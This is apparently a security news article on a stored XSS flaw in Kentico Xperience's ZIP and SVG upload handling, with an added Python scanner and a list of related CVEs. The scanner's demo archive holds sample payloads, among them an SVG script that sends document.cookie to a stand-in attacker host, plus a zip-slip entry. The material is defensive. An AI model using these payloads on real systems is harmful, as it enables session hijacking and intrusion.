Kentico Xperience CMS XSS Vulnerability Let Attackers Execute Remote Code

Kentico Xperience CMS enforces a whitelist of permitted upload file extensions, but the whitelist allows SVG files, which can carry embedded JavaScript. Kentico's custom file handler also processes ZIP archives, so an attacker can package a malicious SVG inside a ZIP, have the handler extract it, and later have the stored file served to users with its script intact, a stored cross-site scripting (XSS) condition.

Crafting Malicious Files: Attackers create an SVG file containing a JavaScript payload and package it into a ZIP archive for upload.

Post-Authentication Remote Code Execution (Optional): If attackers gain administrative access through other means (e.g., by exploiting an authentication bypass vulnerability such as CVE-2025-2746), they can modify the allowed file extensions and upload server-side executable files, such as .aspx, enabling full remote code execution.

This vulnerability poses severe risks, including unauthorized access to sensitive data, session hijacking, and complete server compromise through remote code execution. Note that the XSS alone executes script in victims' browsers; the remote code execution in the headline depends on the separate, admin-level step described above.
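The scanner below is an added example, not code from the cybersecuritynews.com article or from Kentico. It implements, in Python, the checks the article implies a ZIP-upload handler should perform before extracting anything: an extension whitelist, detection of active content (script elements, event-handler attributes, javascript:/data: URLs) inside SVG, and a whitelist audit for server-executable extensions, which is the post-authentication RCE path. It goes a little beyond the article by also sniffing SVG content hidden behind an allowed extension and by rejecting zip-slip entry names, both of which appear in the related CVEs listed below. The whitelist, the set of executable extensions and the sample archive are all assumptions constructed for the demo.

```python
from __future__ import annotations

import io
import posixpath
import zipfile
import xml.etree.ElementTree as ET

# Hypothetical upload whitelist (assumption; Kentico's real list is per-instance
# configuration). "svg" being allowed is the weakness the article describes.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf", "svg"}

# Extensions the IIS/ASP.NET pipeline executes or reads as configuration; any of
# these in an upload whitelist gives an admin-level attacker a path to RCE.
SERVER_EXECUTABLE = {"aspx", "ashx", "asmx", "asax", "ascx", "cshtml", "config", "dll"}

ACTIVE_ELEMENTS = {"script", "foreignobject"}  # <foreignObject> can embed HTML/script
URL_ATTRIBUTES = {"href", "src"}               # matched by local name, so xlink:href counts


def local_name(qualified: str) -> str:
    """Strip an XML namespace: '{http://...}script' -> 'script'."""
    return qualified.rsplit("}", 1)[-1].lower()


def is_svg(data: bytes) -> bool:
    """Content sniff: SVG is whatever parses with an <svg> root, whatever the extension says."""
    try:
        return local_name(ET.fromstring(data).tag) == "svg"
    except ET.ParseError:
        return False


def svg_active_content(data: bytes) -> list[str]:
    """List script-bearing constructs in an SVG document; [] means clean, non-empty means reject."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["malformed XML"]
    if local_name(root.tag) != "svg":
        return []
    findings = []
    for element in root.iter():  # includes the root, so <svg onload=...> is caught
        if local_name(element.tag) in ACTIVE_ELEMENTS:
            findings.append(f"<{local_name(element.tag)}> element")
        for attr, value in element.attrib.items():
            attr_name = local_name(attr)
            if attr_name.startswith("on"):
                findings.append(f"event handler {attr_name}=")
            elif attr_name in URL_ATTRIBUTES:
                # Browsers ignore whitespace inside a scheme ("java\nscript:"), so strip it first.
                scheme = "".join(value.split()).lower().split(":", 1)[0]
                if scheme in ("javascript", "data", "vbscript"):
                    findings.append(f"{attr_name} with {scheme}: URL")
    return findings


def unsafe_entry_name(name: str) -> bool:
    """Zip-slip check: reject absolute paths, drive letters, backslashes and '..' escapes."""
    if name.startswith("/") or "\\" in name or ":" in name or "\x00" in name:
        return True
    normalized = posixpath.normpath(name)
    return normalized == ".." or normalized.startswith("../")


def scan_zip(blob: bytes) -> dict[str, list[str]]:
    """Inspect every entry of an uploaded ZIP before extraction; {} means the archive passed."""
    problems: dict[str, list[str]] = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as archive:
        for info in archive.infolist():
            reasons = []
            if unsafe_entry_name(info.filename):
                reasons.append("unsafe path (zip slip)")
            if not info.is_dir():
                base = posixpath.basename(info.filename)
                ext = base.rsplit(".", 1)[1].lower() if "." in base else ""
                if ext not in ALLOWED_EXTENSIONS:
                    reasons.append(f"extension '.{ext}' not in whitelist")
                data = archive.read(info)
                if ext == "svg" or is_svg(data):  # sniff content, not just the extension
                    active = svg_active_content(data)
                    if active:
                        reasons.append("SVG with active content: " + ", ".join(active))
            if reasons:
                problems[info.filename] = reasons
    return problems


def executable_extensions_in(whitelist: set[str]) -> set[str]:
    """The post-auth RCE audit: which whitelisted extensions would the server execute?"""
    return {e.lower().lstrip(".") for e in whitelist} & SERVER_EXECUTABLE


def build_sample_zip() -> bytes:
    """Constructed sample archive for the demo (not a captured attack)."""
    svg = 'xmlns="http://www.w3.org/2000/svg"'
    xlink = 'xmlns:xlink="http://www.w3.org/1999/xlink"'
    entries = {
        "images/logo.svg": f'<svg {svg}><circle r="4"/></svg>',
        "images/steal.svg": f'<svg {svg}><script>fetch("https://attacker.invalid/?c=" + document.cookie)</script></svg>',
        "images/boom.svg": f'<svg {svg} onload="alert(document.domain)"/>',
        "images/link.svg": f'<svg {svg} {xlink}><a xlink:href="java\nscript:alert(1)"><text>x</text></a></svg>',
        "images/photo.png": f'<svg {svg}><script>alert(1)</script></svg>',  # SVG behind an allowed extension
        "../../web.config": "<configuration/>",  # zip-slip attempt against the extraction root
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        for name, body in entries.items():
            archive.writestr(name, body.encode())
    return buf.getvalue()


if __name__ == "__main__":
    for entry, reasons in scan_zip(build_sample_zip()).items():
        print(f"REJECT {entry}: {'; '.join(reasons)}")
    print("executable extensions in whitelist:", executable_extensions_in(ALLOWED_EXTENSIONS | {".aspx"}) or "none")
```

Reject the whole archive if scan_zip returns anything; the checks have to run before extraction because the attack the article describes depends on the handler extracting the SVG and the server later serving it as-is. Serving user-supplied SVG only with Content-Disposition: attachment, or from a separate origin, is the usual complement to the content check.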

This Cyber News was published on cybersecuritynews.com. Publication date: Tue, 01 Apr 2025 15:10:05 +0000


Cyber News related to Kentico Xperience CMS XSS Vulnerability Let Attackers Execute Remote Code

Kentico Xperience CMS Authentication Bypass Vulnerability Leads to Remote Code Execution - The second bypass exploits a logical flaw in Microsoft’s obsolete Web Services Enhancement 3.0 library, where the system fails to validate tokens with the “SendNone” password option. By manipulating SOAP requests to use password ...
9 months ago Cybersecuritynews.com
CVE-2025-2749 - An authenticated remote code execution in Kentico Xperience allows authenticated users Staging Sync Server to upload arbitrary data to path relative locations. This results in path traversal and arbitrary file upload, including content that can be ...
9 months ago
CVE-2025-2748 - The Kentico Xperience application does not fully validate or filter files uploaded via the multiple-file upload functionality, which allows for stored XSS. This issue affects Kentico Xperience through 13.0.178. ...
9 months ago
CVE-2025-2746 - An authentication bypass vulnerability in Kentico Xperience allows authentication bypass via the Staging Sync Server password handling of empty SHA1 usernames in digest authentication. Authentication bypass allows an attacker to control ...
9 months ago
CVE-2025-2747 - An authentication bypass vulnerability in Kentico Xperience allows authentication bypass via the Staging Sync Server component password handling for the server defined None type. Authentication bypass allows an attacker to control administrative ...
9 months ago
CVE-2025-2794 - An unsafe reflection vulnerability in Kentico Xperience allows an unauthenticated attacker to kill the current process, leading to a Denial-of-Service condition. ...
8 months ago
CVE-2020-15247 - October is a free, open-source, self-hosted CMS platform based on the Laravel PHP Framework. In October CMS from version 1.0.319 and before version 1.0.469, an authenticated backend user with the cms.manage_pages, cms.manage_layouts, or ...
4 years ago
Critical Craft CMS RCE 0-Day Vulnerability Exploited in Attacks to Steal Data - According to security researchers at CERT Orange Cyberdefense, a critical remote code execution (RCE) vulnerability in Craft CMS is actively being exploited to breach servers and steal data. If a system is believed to be compromised, administrators ...
8 months ago Cybersecuritynews.com CVE-2024-58136
CVE-2020-26231 - October is a free, open-source, self-hosted CMS platform based on the Laravel PHP Framework. A bypass of CVE-2020-15247 (fixed in 1.0.469 and 1.1.0) was discovered that has the same impact as CVE-2020-15247. An authenticated backend user with the ...
5 years ago
CVE-2021-21264 - October is a free, open-source, self-hosted CMS platform based on the Laravel PHP Framework. A bypass of CVE-2020-26231 (fixed in 1.0.470/471 and 1.1.1) was discovered that has the same impact as CVE-2020-26231 & CVE-2020-15247. An authenticated ...
3 years ago
CVE-2021-43991 - The Kentico Xperience CMS version 13.0 – 13.0.43 is vulnerable to a persistent Cross-Site Scripting (XSS) vulnerability (also known as Stored or Second-Order XSS). Persistent XSS vulnerabilities occur when the application stores and retrieves ...
4 years ago
CVE-2024-54149 - Winter is a free, open-source content management system (CMS) based on the Laravel PHP framework. Winter CMS prior to versions 1.2.7, 1.1.11, and 1.0.476 allow users with access to the CMS templates sections that modify Twig files to bypass the ...
1 year ago Tenable.com
The Exploration of Static vs Dynamic Code Analysis - Two essential methodologies employed for this purpose are Static Code Analysis and Dynamic Code Analysis. Static Code Analysis involves the examination of source code without its execution. In this exploration of Static vs Dynamic Code Analysis, ...
1 year ago Feeds.dzone.com
CVE-2006-3172 - Multiple PHP remote file inclusion vulnerabilities in Content*Builder 0.7.5 allow remote attackers to execute arbitrary PHP code via a URL with a trailing slash (/) character in the (1) lang_path parameter to (a) cms/plugins/col_man/column.inc.php, ...
8 years ago
CVE-2024-12907 - Kentico CMS in version 7 is vulnerable to a Reflected XSS attacks through manipulation of a specific GET request parameter sent to /CMSMessages/AccessDenied.aspx endpoint. Notably, support for this version of Kentico ended in 2016. Version 8 was ...
11 months ago Tenable.com
CVE-2022-50685 - A stored cross-site scripting vulnerability in Kentico Xperience allows authenticated users to inject malicious scripts via XML file uploads as page attachments or metafiles. Attackers can upload malicious XML files that enable stored XSS, allowing ...
1 week ago
CVE-2024-58321 - A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via form validation rule configuration. Attackers can exploit this vulnerability to execute malicious scripts that will run in users' ...
1 week ago
CVE-2024-58319 - A reflected cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via the Pages dashboard widget configuration dialog. Attackers can exploit this vulnerability to execute malicious scripts in ...
1 week ago
CVE-2024-58318 - A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via the rich text editor component for page and form builders. Attackers can exploit this vulnerability by entering malicious URIs, ...
1 week ago
CVE-2022-50681 - A reflected cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via administration input fields in the Rich text editor component. Attackers can exploit this vulnerability to execute arbitrary scripts ...
1 week ago
CVE-2020-36891 - A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to upload files with spoofed Content-Type that do not match file extensions. Attackers can exploit this vulnerability by uploading malicious files with manipulated MIME ...
1 week ago
CVE-2022-50680 - A stored cross-site scripting vulnerability in Kentico Xperience allows administration users to inject malicious scripts via email marketing templates. Attackers can exploit this vulnerability to execute malicious scripts that could compromise user ...
1 week ago
CVE-2023-53738 - A reflected cross-site scripting vulnerability in Kentico Xperience allows authenticated users to inject malicious scripts via page preview URLs. Attackers can exploit this vulnerability to execute arbitrary scripts in users' browsers during page ...
1 week ago
CVE-2023-53736 - A reflected cross-site scripting vulnerability in Kentico Xperience allows authenticated users to inject malicious scripts in the administration interface. Attackers can exploit this vulnerability to execute arbitrary scripts within the ...
1 week ago